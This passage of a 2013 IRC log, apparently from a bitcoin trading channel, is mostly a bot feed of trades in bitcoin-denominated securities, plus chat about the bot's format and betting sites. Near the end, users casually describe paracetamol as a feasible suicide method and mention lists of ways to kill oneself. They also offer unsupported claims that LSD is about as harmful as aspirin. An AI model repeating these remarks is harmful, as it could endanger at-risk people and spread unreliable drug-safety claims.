1500 @ 0.00275 = 4.125 BTC [+] Sep 17 03:48:56 [BTCTC] [LABCOIN] 700 @ 0.002763 = 1.9341 BTC [+] Sep 17 03:53:01 [BTCTC] [TAT.ASICMINER] 12 @ 0.01924 = 0.2309 BTC [+] Sep 17 03:54:02 [BTCTC] [TAT.ASICMINER] 20 @ 0.01924 = 0.3848 BTC [+] Sep 17 03:54:02 [BTCTC] [CIPHERMINE.B1] 100 @ 0.01023 = 1.023 BTC [-] Sep 17 03:56:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.01924 BTC [+] Sep 17 03:56:04 [BTCTC] [ACTIVEMINING] 2 @ 0.002581 = 0.0052 BTC [+] Sep 17 03:57:05 [BTCTC] [LABCOIN] 1 @ 0.002764 BTC [+] Sep 17 03:59:07 [MPEX] [S.MPOE] 4100 @ 0.00091641 = 3.7573 BTC [-] Sep 17 04:03:10 [BTCTC] [ACTIVEMINING] 540 @ 0.002695 = 1.4553 BTC [+] Sep 17 04:04:11 [BTCTC] [BASIC-MINING] 3 @ 0.109 = 0.327 BTC [+] Sep 17 04:05:12 [HAVELOCK] [VTX] 1 @ 0.59 BTC [-] Sep 17 04:06:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.01924 = 0.0385 BTC [+] Sep 17 04:06:13 [BTCTC] [CIPHERMINE.B1] 40 @ 0.01022 = 0.4088 BTC [-] Sep 17 04:09:16 [HAVELOCK] [VTX] 5 @ 0.589 = 2.945 BTC [-] Sep 17 04:13:20 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0006319 BTC [-] Sep 17 04:13:20 [BTCTC] [ACTIVEMINING] 660 @ 0.00265936 = 1.7552 BTC [-] (2) Sep 17 04:15:22 [BTCTC] [ASICMINER-PT] 7 @ 2.055 = 14.385 BTC [+] Sep 17 04:16:23 [BTCTC] [LABCOIN] 5 @ 0.002761 = 0.0138 BTC [-] Sep 17 04:17:24 [BTCTC] [DMS.PURCHASE] 100 @ 0.009365 = 0.9365 BTC [-] Sep 17 04:18:25 [HAVELOCK] [CBTC] 37000 @ 0.00039757 = 14.7101 BTC [-] (4) Sep 17 04:19:26 [MPEX] [S.MPOE] 4600 @ 0.00091641 = 4.2155 BTC [-] Sep 17 04:25:32 [BTCTC] [LABCOIN] 2446 @ 0.00268101 = 6.5578 BTC [-] (15) Sep 17 04:26:33 [BTCTC] [LABCOIN] 2554 @ 0.00261444 = 6.6773 BTC [-] (24) Sep 17 04:26:34 [HAVELOCK] [CBTC] 8550 @ 0.00039275 = 3.358 BTC [-] (2) Sep 17 04:27:34 [BTCTC] [LABCOIN] 1 @ 0.002756 BTC [+] Sep 17 04:28:35 [HAVELOCK] [CBTC] 28950 @ 0.0003883 = 11.2413 BTC [-] (5) Sep 17 04:37:45 [HAVELOCK] [CBTC] 20000 @ 0.00037854 = 7.5708 BTC [-] (3) Sep 17 04:38:46 [BTCTC] [LABCOIN] 3 @ 0.002701 = 0.0081 BTC [-] Sep 17 04:40:48 [BTCTC] [LABCOIN] 6 @ 0.0027015 = 0.0162 BTC [+] (2) Sep 17 04:41:49 kakobrekla any bitcoin foundation election results bets on bitbet? Sep 17 04:43:13 hm Sep 17 04:43:17 not that id know Sep 17 04:48:56 [BTCTC] [LABCOIN] 6 @ 0.002669 = 0.016 BTC [-] Sep 17 04:55:33 kakobrekla: hey, what's up with the "(2 ops)" in this trade? (16:13) <@assbot> [MPEX] [S.MPOE] 7753 @ 0.00091361 = 7.0832 BTC [+] (2 ops) Sep 17 04:56:29 i saw another mpex trade with "(2)" stuck on the end in my @BitOTTer stream. Does it have a special meaning? Sep 17 04:59:06 [BTCTC] [LABCOIN] 12 @ 0.002692 = 0.0323 BTC [+] (2) Sep 17 05:00:07 [BTCTC] [LABCOIN] 6 @ 0.002692 = 0.0162 BTC [+] Sep 17 05:01:08 [BTCTC] [LABCOIN] 6 @ 0.002669 = 0.016 BTC [-] Sep 17 05:01:29 mod6 trades get condensed now Sep 17 05:01:42 in 1 min piles Sep 17 05:02:09 [BTCTC] [LABCOIN] 24 @ 0.00267975 = 0.0643 BTC [+] (3) Sep 17 05:02:50 live feed is on socket Sep 17 05:03:10 [BTCTC] [LABCOIN] 18 @ 0.00268333 = 0.0483 BTC [+] (3) Sep 17 05:03:10 [BTCTC] [ACTIVEMINING] 770 @ 0.002695 = 2.0752 BTC [+] Sep 17 05:03:33 so if the price and volume are different how does assbot resolve this? Sep 17 05:04:08 in case of multiple trades we have a weighted price Sep 17 05:04:10 does it just add up the volume and then average the price on those trades executed? Sep 17 05:04:11 [BTCTC] [ACTIVEMINING] 190 @ 0.002695 = 0.5121 BTC [+] Sep 17 05:04:21 hmm ok. Sep 17 05:05:38 mod6 Sep 17 05:05:38 mod6 Sep 17 05:05:40 mod6 Sep 17 05:05:41 mod6 Sep 17 05:05:59 mod6 (4) Sep 17 05:06:28 %6 * 4 = mod6 (4) Sep 17 05:08:15 [BTCTC] [LABCOIN] 3 @ 0.002696 = 0.0081 BTC [+] Sep 17 05:09:16 [BTCTC] [LABCOIN] 6 @ 0.002674 = 0.016 BTC [-] Sep 17 05:09:16 [BTCTC] [DMS.PURCHASE] 70 @ 0.009365 = 0.6556 BTC [-] Sep 17 05:10:17 [BTCTC] [ASICMINER-PT] 11 @ 2.04154544 = 22.457 BTC [-] (5) Sep 17 05:10:30 haha Sep 17 05:11:18 [BTCTC] [LABCOIN] 6 @ 0.00264 = 0.0158 BTC [-] Sep 17 05:12:19 [BTCTC] [LABCOIN] 28 @ 0.00269792 = 0.0755 BTC [+] (4) Sep 17 05:13:20 [BTCTC] [LABCOIN] 41 @ 0.00270007 = 0.1107 BTC [+] (3) Sep 17 05:14:21 [BTCTC] [LABCOIN] 80 @ 0.002652 = 0.2122 BTC [-] Sep 17 05:16:23 [BTCTC] [CIPHERMINE.B1] 250 @ 0.01022 = 2.555 BTC [-] Sep 17 05:18:25 [BTCTC] [CIPHERMINE-PT] 1 @ 0.052 BTC [+] Sep 17 05:19:26 [BTCTC] [ASICMINER-PT] 2 @ 2.085 = 4.17 BTC [+] Sep 17 05:23:30 [BTCTC] [DMS.MINING] 20 @ 0.0026 = 0.052 BTC [-] Sep 17 05:26:34 [BTCTC] [CIPHERMINE-PT] 1 @ 0.052 BTC [+] Sep 17 05:26:34 [BTCTC] [DMS.SELLING] 628 @ 0.00704469 = 4.4241 BTC [+] (4) Sep 17 05:28:41 pandora is going to do a share offering Sep 17 05:28:47 learning from the bitidiots Sep 17 05:28:54 no business model? no problem! Sep 17 05:32:40 [BTCTC] [S] [BTC-BOND] 1 @ 0.0102 BTC [+] Sep 17 05:33:41 [BTCTC] [S] [ASICMINER-PT] 3 @ 2.04233333 = 6.127 BTC [-] {2} Sep 17 05:33:41 [BTCTC] [S] [BTC-BOND] 3 @ 0.01021 = 0.0306 BTC [+] Sep 17 05:34:42 [BTCTC] [S] [BTC-BOND] 96 @ 0.010222 = 0.9813 BTC [+] Sep 17 05:37:34 there Sep 17 05:38:01 ill be changing the syntax every 10 minutes or so Sep 17 05:38:09 just to fuck with the parsers! Sep 17 05:38:37 I'M MAD AT YOU KAKOBREKLA Sep 17 05:38:46 [MPEX] [S] [S.MPOE] 6103 @ 0.0009171 = 5.5971 BTC [+] {2} Sep 17 05:39:08 aha? Sep 17 05:39:34 you don't make enough that's what she said jokes :P Sep 17 05:39:39 fix that and we'll be cool again Sep 17 05:39:49 thats what she said Sep 17 05:41:49 [BTCTC] [S] [ASICMINER-PT] 4 @ 2.041 = 8.164 BTC [-] Sep 17 05:41:49 [MPEX] [S] [S.MPOE] 1731 @ 0.00091671 = 1.5868 BTC [-] Sep 17 05:43:51 [BTCTC] [S] [DMS.MINING] 2509 @ 0.00242142 = 6.0753 BTC [-] {5} Sep 17 05:43:52 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.041 BTC [-] Sep 17 05:44:53 [BTCTC] [S] [LABCOIN] 15 @ 0.002714 = 0.0407 BTC [+] {2} Sep 17 05:45:54 [BTCTC] [S] [DMS.MINING] 1 @ 0.002407 BTC [-] Sep 17 05:45:54 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.042 BTC [+] Sep 17 05:46:55 [BTCTC] [S] [LABCOIN] 5 @ 0.002714 = 0.0136 BTC [+] Sep 17 05:48:57 [BTCTC] [S] [LABCOIN] 10 @ 0.002714 = 0.0271 BTC [+] Sep 17 05:48:57 [BTCTC] [S] [DMS.MINING] 968 @ 0.00236892 = 2.2931 BTC [-] {5} Sep 17 05:50:59 [HAVELOCK] [S] [HIM] 1 @ 0.1699 BTC [+] Sep 17 05:57:05 [HAVELOCK] [S] [XBOND] 3 @ 0.00120499 = 0.0036 BTC [+] Sep 17 05:59:05 ;;later tell burnside recheck what you are sending in as type, i see some errors (bonds as shares..) Sep 17 05:59:05 The operation succeeded. Sep 17 05:59:24 ;;later tell topace recheck what you are sending in as type, i see some errors (bonds as shares..) Sep 17 05:59:24 The operation succeeded. Sep 17 06:00:07 [BTCTC] [S] [ACTIVEMINING] 12 @ 0.002545 = 0.0305 BTC [-] Sep 17 06:01:08 [BTCTC] [S] [LABCOIN] 11 @ 0.002714 = 0.0299 BTC [+] Sep 17 06:02:09 [BTCTC] [S] [LABCOIN] 12 @ 0.002713 = 0.0326 BTC [-] Sep 17 06:03:10 [BTCTC] [S] [KENILWORTH] 1 @ 0.001747 BTC [+] Sep 17 06:04:11 [BTCTC] [S] [LABCOIN] 20 @ 0.002713 = 0.0543 BTC [-] Sep 17 06:05:12 [BTCTC] [S] [ACTIVEMINING] 17 @ 0.002735 = 0.0465 BTC [+] Sep 17 06:06:13 [BTCTC] [S] [ACTIVEMINING] 1 @ 0.002735 BTC [+] Sep 17 06:06:13 [BTCTC] [S] [LABCOIN] 20 @ 0.002713 = 0.0543 BTC [-] Sep 17 06:07:14 [BTCTC] [S] [LABCOIN] 20 @ 0.00271449 = 0.0543 BTC [+] {4} Sep 17 06:08:15 [BTCTC] [S] [LABCOIN] 5 @ 0.002716 = 0.0136 BTC [+] Sep 17 06:09:16 [BTCTC] [FN] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [+] Sep 17 06:10:17 [BTCTC] [S] [LABCOIN] 16 @ 0.0027185 = 0.0435 BTC [+] {3} Sep 17 06:11:18 [BTCTC] [S] [LABCOIN] 4 @ 0.002722 = 0.0109 BTC [+] Sep 17 06:16:23 [BTCTC] [S] [NASTY-PT] 10 @ 0.00175 = 0.0175 BTC [-] Sep 17 06:17:24 [HAVELOCK] [S] [AM100] 3 @ 0.018941 = 0.0568 BTC [-] Sep 17 06:18:25 [BTCTC] [S] [NASTY-PT] 5 @ 0.001755 = 0.0088 BTC [+] Sep 17 06:21:28 [BTCTC] [S] [RSM] 95 @ 0.006752 = 0.6414 BTC [+] Sep 17 06:21:28 [HAVELOCK] [S] [AM100] 273 @ 0.0187083 = 5.1074 BTC [-] {10} Sep 17 06:22:29 [HAVELOCK] [S] [AM100] 99 @ 0.01860556 = 1.842 BTC [-] {3} Sep 17 06:23:30 [BTCTC] [FN] [BTC-GOLD] 13 @ 0.006 = 0.078 BTC [-] Sep 17 06:25:32 [HAVELOCK] [S] [AM100] 121 @ 0.01853683 = 2.243 BTC [-] {5} Sep 17 06:26:33 [HAVELOCK] [S] [AM100] 1 @ 0.01997 BTC [+] Sep 17 06:28:35 [HAVELOCK] [S] [LABCO] 400 @ 0.0028 = 1.12 BTC [-] Sep 17 06:29:37 [BTCTC] [S] [BASIC-MINING] 1 @ 0.109 BTC [+] Sep 17 06:31:58 kakobrekla: so what does [S] mean? Sep 17 06:33:58 super good buy? Sep 17 06:34:42 [HAVELOCK] [S] [CBTC] 8160 @ 0.00048976 = 3.9964 BTC [+] {3} Sep 17 06:35:43 [MPEX] [S] [S.MPOE] 7863 @ 0.00091655 = 7.2068 BTC [-] {2} Sep 17 06:37:45 [HAVELOCK] [S] [CBTC] 7 @ 0.00048999 = 0.0034 BTC [+] Sep 17 06:42:00 Assbot got all fancy Sep 17 06:44:52 [BTCTC] [B] [CIPHERMINE.B1] 189 @ 0.0102 = 1.9278 BTC [-] {2} Sep 17 06:45:03 im assuming that [S] = Stock, but then i see XBOND and BTC-BOND with that tag also. what about [FN]? Fund? Sep 17 06:45:53 [BTCTC] [B] [CIPHERMINE.B1] 11 @ 0.01009 = 0.111 BTC [-] Sep 17 06:47:45 gta v is pretty sweeeeet Sep 17 06:53:00 [BTCTC] [S] [TAT.ASICMINER] 1 @ 0.019 BTC [-] Sep 17 06:53:00 [MPEX] [S] [S.MPOE] 9000 @ 0.00091869 = 8.2682 BTC [+] {2} Sep 17 06:54:01 [BTCTC] [S] [LABCOIN] 22 @ 0.002719 = 0.0598 BTC [-] {4} Sep 17 07:00:07 [BTCTC] [S] [TAT.ASICMINER] 33 @ 0.01885 = 0.6221 BTC [-] Sep 17 07:03:10 [BTCTC] [S] [ASICMINER-PT] 2 @ 2.049 = 4.098 BTC [+] {2} Sep 17 07:04:11 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.049 BTC [+] Sep 17 07:05:12 [HAVELOCK] [S] [AM100] 1 @ 0.01851001 BTC [-] Sep 17 07:06:13 [BTCTC] [S] [TAT.ASICMINER] 233 @ 0.01876 = 4.3711 BTC [-] Sep 17 07:09:16 [BTCTC] [S] [TAT.ASICMINER] 10 @ 0.01879 = 0.1879 BTC [+] Sep 17 07:10:17 [BTCTC] [S] [LABCOIN] 7 @ 0.002719 = 0.019 BTC [-] Sep 17 07:12:19 [BTCTC] [S] [TAT.ASICMINER] 12 @ 0.01879 = 0.2255 BTC [+] Sep 17 07:14:21 [BTCTC] [S] [TAT.ASICMINER] 38 @ 0.0188 = 0.7144 BTC [+] Sep 17 07:14:21 [BTCTC] [S] [LABCOIN] 7 @ 0.002719 = 0.019 BTC [-] Sep 17 07:16:23 [BTCTC] [S] [LABCOIN] 5 @ 0.002719 = 0.0136 BTC [-] Sep 17 07:17:24 [BTCTC] [S] [LABCOIN] 7 @ 0.00271971 = 0.019 BTC [+] {2} Sep 17 07:21:29 [HAVELOCK] [S] [SDSTM] 11 @ 0.00249999 = 0.0275 BTC [+] Sep 17 07:22:30 [HAVELOCK] [S] [XBOND] 1 @ 0.00120498 BTC [-] Sep 17 07:23:30 [MPEX] [S] [S.MPOE] 19400 @ 0.00091929 = 17.8342 BTC [+] {3} Sep 17 07:23:31 [HAVELOCK] [S] [HIM] 1 @ 0.165 BTC [-] Sep 17 07:25:33 [HAVELOCK] [S] [HIM] 4 @ 0.165 = 0.66 BTC [-] Sep 17 07:27:35 [HAVELOCK] [S] [HIM] 4 @ 0.16075 = 0.643 BTC [-] {3} Sep 17 07:31:38 [BTCTC] [B] [CIPHERMINE.B1] 1 @ 0.01022 BTC [+] Sep 17 07:35:42 [BTCTC] [S] [LABCOIN] 200 @ 0.00279427 = 0.5589 BTC [+] {5} Sep 17 07:36:43 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.049 BTC [+] Sep 17 07:37:44 [BTCTC] [S] [TAT.ASICMINER] 24 @ 0.01923 = 0.4615 BTC [+] Sep 17 07:49:10 gta5 stream Sep 17 07:49:33 fail. wrong keyboard Sep 17 07:51:58 [BTCTC] [S] [ASICMINER-PT] 4 @ 2.041 = 8.164 BTC [-] Sep 17 07:52:59 [BTCTC] [S] [TAT.ASICMINER] 100 @ 0.01925 = 1.925 BTC [+] Sep 17 07:52:59 [MPEX] [S] [S.MPOE] 3477 @ 0.00091853 = 3.1937 BTC [-] Sep 17 07:53:49 MtGox BTCUSD ticker | Best bid: 138.47759, Best ask: 138.48700, Bid-ask spread: 0.00941, Last trade: 138.48560, 24 hour volume: 10357.87583074, 24 hour low: 138.00000, 24 hour high: 142.23000, 24 hour vwap: 139.73511 Sep 17 08:04:20 I think that's the funniest thing I've read today Sep 17 08:08:41 http://bitbet.us/propositions/ - I didn't realize this was public knowledge. Sep 17 08:09:13 three apple proposals? Sep 17 08:09:15 [BTCTC] [B] [CIPHERMINE.B1] 1 @ 0.01038 BTC [+] Sep 17 08:10:16 [HAVELOCK] [S] [AM100] 8 @ 0.018511 = 0.1481 BTC [+] Sep 17 08:12:19 [HAVELOCK] [S] [AM100] 425 @ 0.01851 = 7.8668 BTC [-] {5} Sep 17 08:15:21 [HAVELOCK] [S] [XBOND] 1 @ 0.00120498 BTC [-] Sep 17 08:20:28 yaaah Sep 17 08:20:33 that would have been good last year Sep 17 08:20:56 I would have made "drops below 500 by Q4" last August and been rich yo Sep 17 08:23:30 [HAVELOCK] [S] [XBOND] 33 @ 0.00120498 = 0.0398 BTC [-] Sep 17 08:24:31 [BTCTC] [S] [TAT.VIRTUALMINE] 1 @ 0.0006319 BTC [-] Sep 17 08:35:18 same, but I wasn't aware where I could bet on it Sep 17 08:38:45 [MPEX] [S] [S.MPOE] 8150 @ 0.00091984 = 7.4967 BTC [+] {2} Sep 17 08:41:48 [MPEX] [S] [S.MPOE] 5634 @ 0.00091853 = 5.175 BTC [-] Sep 17 08:57:03 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.049 BTC [+] Sep 17 08:58:04 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.05 BTC [+] Sep 17 09:00:06 [BTCTC] [S] [TAT.ASICMINER] 315 @ 0.01925 = 6.0638 BTC [+] Sep 17 09:01:07 [BTCTC] [S] [BMF] 1 @ 0.03475 BTC [+] Sep 17 09:03:09 [BTCTC] [FN] [DMS.SELLING] 200 @ 0.0070488 = 1.4098 BTC [+] {2} Sep 17 09:05:11 [BTCTC] [S] [PETA-MINE] 2 @ 0.655 = 1.31 BTC [+] Sep 17 09:06:12 [MPEX] [S] [S.MPOE] 589 @ 0.00091853 = 0.541 BTC [-] Sep 17 09:07:13 [HAVELOCK] [S] [AM100] 1 @ 0.01965 BTC [+] Sep 17 09:08:14 [BTCTC] [S] [LABCOIN] 1781 @ 0.00278142 = 4.9537 BTC [-] {18} Sep 17 09:08:15 [BTCTC] [FN] [DMS.PURCHASE] 49 @ 0.009365 = 0.4589 BTC [-] Sep 17 09:12:19 [BTCTC] [S] [BTC-BOND] 1000 @ 0.01025235 = 10.2524 BTC [+] {7} Sep 17 09:31:37 [MPEX] [S] [S.MPOE] 3550 @ 0.000919 = 3.2625 BTC [+] {2} Sep 17 09:32:38 [BTCTC] [S] [PETA-MINE] 10 @ 0.646 = 6.46 BTC [-] Sep 17 09:42:48 [HAVELOCK] [S] [AM100] 1 @ 0.01965 BTC [+] Sep 17 09:45:51 [HAVELOCK] [S] [XBOND] 4250 @ 0.0012 = 5.1 BTC [-] {2} Sep 17 09:45:52 [BTCTC] [FN] [DMS.SELLING] 14 @ 0.00689121 = 0.0965 BTC [-] {2} Sep 17 09:46:52 [BTCTC] [FN] [DMS.SELLING] 386 @ 0.00683 = 2.6364 BTC [-] Sep 17 09:46:52 [HAVELOCK] [S] [XBOND] 1000 @ 0.00117134 = 1.1713 BTC [-] {5} Sep 17 09:51:57 [HAVELOCK] [S] [XBOND] 4 @ 0.00120499 = 0.0048 BTC [+] Sep 17 09:51:58 [BTCTC] [S] [TAT.VIRTUALMINE] 150 @ 0.000632 = 0.0948 BTC [+] Sep 17 09:51:58 [HAVELOCK] [S] [AM1] 1 @ 1.9779 BTC [-] Sep 17 09:52:58 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.044 BTC [-] Sep 17 09:54:22 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.042 BTC [-] Sep 17 09:55:00 [BTCTC] [S] [ASICMINER-PT] 2 @ 2.042 = 4.084 BTC [-] {2} Sep 17 09:55:00 [HAVELOCK] [S] [AM1] 2 @ 1.978 = 3.956 BTC [+] Sep 17 10:00:05 [HAVELOCK] [S] [XBOND] 3450 @ 0.00116811 = 4.03 BTC [-] {3} Sep 17 10:00:07 [HAVELOCK] [S] [AM1] 1 @ 1.9999 BTC [+] Sep 17 10:02:08 [HAVELOCK] [S] [XBOND] 102 @ 0.001166 = 0.1189 BTC [-] {2} Sep 17 10:06:12 [HAVELOCK] [S] [AM100] 222 @ 0.01851045 = 4.1093 BTC [-] {2} Sep 17 10:06:13 [BTCTC] [S] [DMS.MINING] 4 @ 0.00259 = 0.0104 BTC [+] Sep 17 10:08:14 [BTCTC] [S] [DMS.MINING] 10 @ 0.002594 = 0.0259 BTC [+] Sep 17 10:13:19 [BTCTC] [S] [LABCOIN] 13 @ 0.00278092 = 0.0362 BTC [-] {5} Sep 17 10:19:25 [HAVELOCK] [S] [SMG] 5800 @ 0.00018265 = 1.0594 BTC [-] {8} Sep 17 10:25:31 [HAVELOCK] [S] [CBTC] 2132 @ 0.00049323 = 1.0516 BTC [+] {5} Sep 17 10:30:36 [HAVELOCK] [S] [SMG] 4900 @ 0.0001725 = 0.8453 BTC [-] Sep 17 10:32:38 [HAVELOCK] [S] [CBTC] 8920 @ 0.00049399 = 4.4064 BTC [+] {2} Sep 17 10:34:40 [HAVELOCK] [S] [CBTC] 194 @ 0.00049444 = 0.0959 BTC [+] Sep 17 10:37:43 [BTCTC] [S] [LABCOIN] 6839 @ 0.00279241 = 19.0973 BTC [+] {8} Sep 17 10:39:45 [HAVELOCK] [S] [SDSTM] 53 @ 0.00230886 = 0.1224 BTC [-] {4} Sep 17 10:40:46 [HAVELOCK] [S] [CBTC] 247 @ 0.00049444 = 0.1221 BTC [+] Sep 17 10:41:47 [BTCTC] [S] [S.MPOE-PT] 1202 @ 0.00089945 = 1.0811 BTC [+] {5} Sep 17 10:48:54 [BTCTC] [B] [CIPHERMINE.B1] 199 @ 0.01025 = 2.0398 BTC [-] Sep 17 10:52:58 [MPEX] [S] [S.MPOE] 3150 @ 0.00091991 = 2.8977 BTC [+] Sep 17 10:56:01 [BTCTC] [S] [ASICMINER-PT] 2 @ 2.041 = 4.082 BTC [-] Sep 17 10:59:04 [BTCTC] [S] [TAT.ASICMINER] 1 @ 0.01927 BTC [+] Sep 17 11:00:05 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.083 BTC [+] Sep 17 11:04:09 [BTCTC] [S] [TAT.ASICMINER] 3 @ 0.01927 = 0.0578 BTC [+] Sep 17 11:16:21 [BTCTC] [S] [ACTIVEMINING] 1 @ 0.0026 BTC [-] Sep 17 11:20:25 [BTCTC] [S] [TAT.ASICMINER] 32 @ 0.01928 = 0.617 BTC [+] Sep 17 11:21:26 [BTCTC] [S] [TAT.ASICMINER] 13 @ 0.01928 = 0.2506 BTC [+] Sep 17 11:23:28 [BTCTC] [S] [BITVPS] 3 @ 0.001989 = 0.006 BTC [+] Sep 17 11:26:31 [BTCTC] [S] [BASIC-MINING] 2 @ 0.109 = 0.218 BTC [+] Sep 17 11:27:32 [HAVELOCK] [S] [AM100] 1 @ 0.01964999 BTC [+] Sep 17 11:30:35 [MPEX] [S] [S.MPOE] 1597 @ 0.00091991 = 1.4691 BTC [+] Sep 17 11:31:36 [MPEX] [S] [S.MPOE] 20503 @ 0.00092078 = 18.8788 BTC [+] {4} Sep 17 11:31:36 [BTCTC] [S] [PETA-MINE] 2 @ 0.655 = 1.31 BTC [+] Sep 17 11:44:50 [HAVELOCK] [S] [CBTC] 559 @ 0.00049444 = 0.2764 BTC [+] Sep 17 11:47:53 [MPEX] [S] [S.MPOE] 2500 @ 0.00091948 = 2.2987 BTC [-] Sep 17 11:48:54 [BTCTC] [S] [BASIC-MINING] 10 @ 0.1095 = 1.095 BTC [+] Sep 17 11:51:57 [BTCTC] [S] [TAT.VIRTUALMINE] 2 @ 0.000632 = 0.0013 BTC [+] Sep 17 11:53:59 [HAVELOCK] [S] [XBOND] 8 @ 0.0012045 = 0.0096 BTC [+] Sep 17 11:57:02 [MPEX] [S] [S.MPOE] 6700 @ 0.00091948 = 6.1605 BTC [-] Sep 17 12:00:05 [HAVELOCK] [S] [CBTC] 200 @ 0.0005 = 0.1 BTC [+] Sep 17 12:01:06 [HAVELOCK] [S] [CBTC] 64 @ 0.0005 = 0.032 BTC [+] Sep 17 12:08:13 [BTCTC] [S] [BTC-TRADING-PT] 1 @ 1.025 BTC [+] Sep 17 12:13:18 [MPEX] [S] [S.MPOE] 10250 @ 0.00091942 = 9.4241 BTC [-] Sep 17 12:16:21 [BTCTC] [FN] [DMS.PURCHASE] 22 @ 0.009051 = 0.1991 BTC [-] Sep 17 12:17:22 [BTCTC] [S] [DMS.MINING] 76 @ 0.002594 = 0.1971 BTC [+] {2} Sep 17 12:22:27 [HAVELOCK] [S] [XBOND] 50 @ 0.00119 = 0.0595 BTC [-] Sep 17 13:01:05 [MPEX] [S] [S.MPOE] 12453 @ 0.00091893 = 11.4434 BTC [-] {2} Sep 17 13:09:13 [BTCTC] [S] [COGNITIVE] 5 @ 0.20994 = 1.0497 BTC [+] {4} Sep 17 13:12:16 [BTCTC] [S] [RSM] 50 @ 0.009499 = 0.475 BTC [+] Sep 17 13:13:17 [BTCTC] [S] [LABCOIN] 160 @ 0.002805 = 0.4488 BTC [+] Sep 17 13:16:20 [BTCTC] [S] [TAT.ASICMINER] 52 @ 0.01889711 = 0.9826 BTC [-] {2} Sep 17 13:18:22 [BTCTC] [FN] [BTC-GROWTH] 2 @ 0.09802 = 0.196 BTC [-] Sep 17 13:19:23 [BTCTC] [S] [PETA-MINE] 1 @ 0.655 BTC [+] Sep 17 13:20:24 [BTCTC] [S] [LABCOIN] 3026 @ 0.00284098 = 8.5968 BTC [+] {9} Sep 17 13:20:24 [BTCTC] [S] [KENILWORTH] 583 @ 0.00174765 = 1.0189 BTC [+] {3} Sep 17 13:21:25 [BTCTC] [S] [BASIC-MINING] 5 @ 0.1098 = 0.549 BTC [+] {2} **** ENDING LOGGING AT Tue Sep 17 13:23:28 2013 **** BEGIN LOGGING AT Tue Sep 17 13:24:07 2013 Sep 17 13:25:00 okey guys shh he's here now Sep 17 13:30:43 no he's not. Sep 17 13:32:37 [BTCTC] [FN] [BTC-GROWTH] 1 @ 0.09999 BTC [+] Sep 17 13:37:49 "Though these rules against testing are only DEA "guidelines" (we do not believe they are part of any law or publicly available official policy), representatives of at least one lab we spoke with have been threatened with having their license revoked after participating in research the DEA didn't like. Since DEA licensing is required in order to handle Schedule I substances, labs that work with such chemicals are under Sep 17 13:37:49 standably reticent to risk their livelihood by going against these guidelines." Sep 17 13:37:53 https://www.erowid.org/chemicals/lsd/lsd_article1.shtml Sep 17 13:37:56 Erowid LSD (Acid) Vault : LSD Analysis Sep 17 13:44:49 [BTCTC] [S] [LABCOIN] 6 @ 0.00284366 = 0.0171 BTC [+] {3} Sep 17 13:45:50 [BTCTC] [S] [LABCOIN] 6 @ 0.002814 = 0.0169 BTC [-] {3} Sep 17 14:04:08 [BTCTC] [S] [LABCOIN] 2 @ 0.002801 = 0.0056 BTC [-] Sep 17 14:05:09 [HAVELOCK] [S] [HIM] 8 @ 0.16 = 1.28 BTC [-] Sep 17 14:06:19 I wonder on all the things we're missing out Sep 17 14:06:49 due to all the chemical/medicine restrictions Sep 17 14:07:11 [HAVELOCK] [S] [AM1] 4 @ 2 = 8 BTC [+] Sep 17 14:12:15 [BTCTC] [S] [LABCOIN] 2 @ 0.002799 = 0.0056 BTC [-] Sep 17 14:16:19 [HAVELOCK] [S] [DEALCO] 5 @ 0.00999999 = 0.05 BTC [+] Sep 17 14:19:01 well lsd in particular is quite lulzy for a schedule i substance Sep 17 14:19:10 seeing how it's about as harmful as aspirin. Sep 17 14:25:28 [BTCTC] [S] [LABCOIN] 2 @ 0.002791 = 0.0056 BTC [-] Sep 17 14:25:50 it's probably more harmful than aspirin, but less harmful than ethanol Sep 17 14:27:03 aspirin documentedly gives you ulcer, and there are some rare liver failure modes. Sep 17 14:27:15 lsd has neither as far as anyone knows. Sep 17 14:27:46 aspirin can be harmful to some people Sep 17 14:28:18 harmful to some people is.. well.. not very descriptive Sep 17 14:28:52 random_cat reye's syndrome, kids under 12ish aren't prescribed aspiring if they ahve a fever because of it. Sep 17 14:29:11 Aspirin should not be taken by people who are allergic to ibuprofen or naproxen,[67][68] or who have salicylate intolerance[69][70] or a more generalized drug intolerance to NSAIDs, and caution should be exercised in those with asthma or NSAID-precipitated bronchospasm. Sep 17 14:29:20 but it doesn't get better than "kids" because we don't actually have a clue wtf causes it. Sep 17 14:29:40 I have light asthma, so I remembered correctly :) Sep 17 14:29:58 yeah, thta's the big one the use to promote acetaminophen.. or wtf they call it in the rest of the world Sep 17 14:30:06 paracetamol. Sep 17 14:30:16 which also gives you liver failure in some cases :D Sep 17 14:30:25 but it's so rare that we might as well be talking about accidently being struck by lightning in the eye Sep 17 14:30:45 not quite. Sep 17 14:30:47 yeah, paracetamol isn't a good idea at high dosage or long-term Sep 17 14:30:48 everything causes liver failure. or cancer Sep 17 14:31:04 paracetamol is a quite feasible if unpleasant way to do yourself in. Sep 17 14:31:20 i recall it made my list of "ways to kill yourself". Sep 17 14:31:27 paracetamol + alcohol is a danger zone for sure (probably more dangerous than aspirin + alcohol) Sep 17 14:31:35 [BTCTC] [B] [CIPHERMINE.B1] 1 @ 0.0102 BTC [-] Sep 17 14:31:37 mircea_popescu: posted somewhere? Sep 17 14:32:08 anyway... i think both substances are in the realm of 'mostly harmless' Sep 17 14:32:30 those lists are usually useless as they don't factor success rate, time to effect, or price Sep 17 14:32:36 [BTCTC] [S] [LABCOIN] 1 @ 0.0028 BTC [+] Sep 17 14:32:36 [BTCTC] [S] [BMF] 1 @ 0.032 BTC [-] Sep 17 14:33:47 (obviously at different dosage levels -- has anyone done massive (significant fractions of a gram) lsd? Sep 17 14:34:38 [BTCTC] [S] [TAT.ASICMINER] 234 @ 0.01877341 = 4.393 BTC [-] {4} Sep 17 14:34:51 ahah! so my lawyer went and picked his vinyard, and so he sent me 20 liters of however you call the pre-wine juice thing. Sep 17 14:35:02 who said lawyers are 